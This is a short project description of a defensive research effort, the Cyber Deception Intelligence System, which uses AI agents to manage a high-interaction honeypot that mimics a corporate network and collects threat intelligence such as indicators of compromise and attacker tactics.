Cyber Deception Intelligence System

Project description

How can a dynamic high-interaction research-based honeypot be deployed to mimic a real corporate network, engage attackers, and extract actionable Threat Intelligence (TI), including Indicators of Compromise (IoCs), Tactics, Techniques, and Procedures (TTPs) and using specialized AI agents to automate the orchestration and adaptive management of such a honeypot to ensure scalability and effectiveness?

Context

Cyber Deception Intelligence System (CDIS), is situated within the Cybersecurity domain, focusing on advanced Cyber Threat Intelligence (CTI) and active defense through cyber deception. The initiative addresses the shortcomings of traditional, reactive security measures, which are often insufficient against sophisticated modern attacks. Standard honeypots are frequently static and easily recognized by adversaries, limiting their ability to gather high-quality intelligence.

Results

The project’s most important outcome is a functional Proof-of-Concept (PoC) framework that answers our main research question: it is possible to use specialized AI agents to automate the orchestration and management of a research-based honeypot. Our prototype AI System successfully interacted with the SOC Stack (Elastic SIEM) to manage the Honeypot. This validates the architectural blueprint as viable, moving it from a theoretical concept to a working model.

About the project group

Our project group is developing the Cyber Deception Intelligence System (CDIS), a proactive security solution designed to counter sophisticated cyber threats. The team's primary researcher has a background in Infrastructure, Cyber Security & Generative AI and is focused on building the AI System stack. This system employs agentic AI to automate the orchestration and management of a dynamic, high-interaction honeypot that mimics a corporate network. The core mission is to engage attackers, analyze their behavior in real-time, and extract actionable Threat Intelligence (TI), including TTPs and IoCs.